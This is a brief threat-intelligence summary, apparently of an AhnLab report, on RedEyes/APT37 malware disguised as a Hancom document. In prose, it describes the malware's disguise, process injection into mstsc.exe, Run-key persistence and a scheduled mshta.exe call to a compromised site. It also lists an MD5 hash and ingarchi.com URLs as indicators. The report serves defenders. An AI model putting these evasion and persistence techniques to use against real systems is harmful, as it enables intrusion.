AhnLab observed malware distributed as an executable disguised with a Hancom Office document icon and named like a Korean-language column file, linking the activity to RedEyes/APT37 infrastructure. When executed, the malware copies itself under AppData as onedrivenew.exe, drops and opens a decoy Hancom document, injects into the legitimate mstsc.exe process, and deletes the original file through cmd. It establishes persistence with a Run-key entry named onedrivenew and schedules OneDriveOp to invoke mshta.exe every 60 minutes against a URL on a compromised legitimate website. AhnLab notes that the inserted web shell matches prior RedEyes/APT37 targeting of website-production firms and provides representative indicators including the MD5 93fc0fb9b87a00b38f18c1cc4ee02e50 and ingarchi.com URLs.